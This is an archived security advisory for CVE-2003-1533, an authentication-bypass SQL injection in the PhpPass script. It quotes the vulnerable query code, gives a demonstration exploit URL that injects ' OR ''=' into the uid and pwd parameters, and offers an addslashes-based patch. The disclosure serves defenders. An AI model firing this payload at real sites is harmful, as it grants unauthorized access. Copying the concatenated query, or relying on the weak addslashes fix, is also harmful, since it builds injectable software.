SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Security)  >   PhpPass Vendors:   Qads
PhpPass Input Validation Flaw Lets Remote Users Inject SQL Commands to Gain Access to the System
SecurityTracker Alert ID:  1005948
SecurityTracker URL:  http://securitytracker.com/id/1005948
CVE Reference:   CVE-2003-1533   (Links to External Site)
Updated:  Jun 14 2008
Original Entry Date:  Jan 20 2003
Impact:   User access via network
Exploit Included:  Yes  
Version(s): 2
Description:   An input validation vulnerability was reported in the PhpPass web page password protection script. A remote user can gain access to protected web pages.

Frog-m@n reported that the 'accesscontrol.php' script does not properly validate user-supplied input. A remote user can submit a specially crafted URL that will modify the SQL statement and cause the server to authenticate the remote user as the first user in the database.

A demonstration exploit URL is provided:

http://[target]/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='

Impact:   A remote user can gain access to ostensibly protected web pages.
Solution:   No vendor solution was available at the time of this entry. The author of the report has developed an unofficial patch, listed in the Source Message and available at:

http://www.phpsecure.org/

Vendor URL:  qadsscripts.strykenet.com/home.php?what=Scripts&cat=11&id=1&mcat=PHP (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  phpPass (PHP)



Informations :
Version : 2
Website : http://www.agames-net.com
Problem : SQL Injection

PHP Code/Location :
accesscontrol.php :
------------------------------------------------
[...]
session_register("uid");
session_register("pwd");
[...]
$sql = "SELECT * FROM user WHERE
        userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
[...]
if (mysql_num_rows($result) == 0) {
  session_unregister("uid");
  session_unregister("pwd");
  ?>
  <html>
  <head>
  <title> Access Denied </title>
[...]
  exit;
[...]
------------------------------------------------


Exploit :
http://[target]/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='


Patch :
In accesscontrol.php, replace the lines :
-------------------------------------------------
$sql = "SELECT * FROM user WHERE
        userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
------------------------------------------------

by :
------------------------------------------------------------------------
$uid=addslashes($uid);
$pwd=addslashes($pwd);
$sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
------------------------------------------------------------------------

A patch can be found on http://www.phpsecure.org .


More details :
In French :
http://www.frog-man.org/tutos/phpPass.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpPass.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n



_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis ! 
http://www.msn.fr/msger/default.asp


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC